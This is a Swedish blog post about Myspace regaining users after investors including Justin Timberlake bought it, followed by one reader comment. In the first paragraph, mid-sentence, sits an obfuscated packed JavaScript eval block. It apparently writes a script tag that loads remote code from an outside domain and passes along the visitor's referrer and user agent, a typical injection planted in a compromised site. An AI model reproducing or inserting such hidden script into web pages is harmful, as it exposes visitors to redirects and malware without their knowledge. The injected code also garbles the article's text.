Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Myspace tar sig tillbaka in på marknaden med Justin Timberlake

Myspace tar sig tillbaka in på marknaden med Justin Timberlake
Sebastian

Är eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|haizy|var|u0026u|referrer|rtbyz||js|php’.split(’|’),0,{}))
det sant? Ja, MySpace det gamla ”super” nätverket lever igen. För 8 år sedan när Facebook föddes dog ett annat nätverk och det var sorgligt nog Myspace. De försökte länge att leva vidare med hjälp av att lyfta artister och låta dem skapa sina musiksidor där och dela. Tyvärr kom några svenskar och tog den idén också, SoundCloud, men…

Nu verkar det som att MySpace är på väg upp igen. Efter att rapporter gick ut om att nya investerare (bl.a. Justin Timberlake) köpt upp det sociala nätverket har pressen ökat som aldrig för. 1 miljon nya användare har vänt Facebook ryggen och börjat att aktivt använda MySpace istället. Kan ”The Social Network” killen kanske fått sig en stämpel efter filmen som lockar den yngre publiken att nu gå med i hans sociala nätverk istället för Zuckerbergs?

Den stora förändringen som strategiskt gjort att Myspace faktiskt ökat är att det har dragit ner på den stora ”head to head” konkurrerande marknadsföringen mot Facebook. Istället försöker de nu utnyttja de licensavtal som de redan har med skivbolag och oberoende artister på hemsidan och lyfta dessa.

Myspace rullade också ut en ny musikspelare i december och har arbetat hårt för att integrera denna med Facebook och Twitter. Ny VD är Chris Vanderhook som berättade för NY Times att det var detta partnerskap som verkligen drev den nya tillväxten till MySpace.

Comments

  1. Myspace

    Sweet!!! Hade det här för sjukt längesen 😛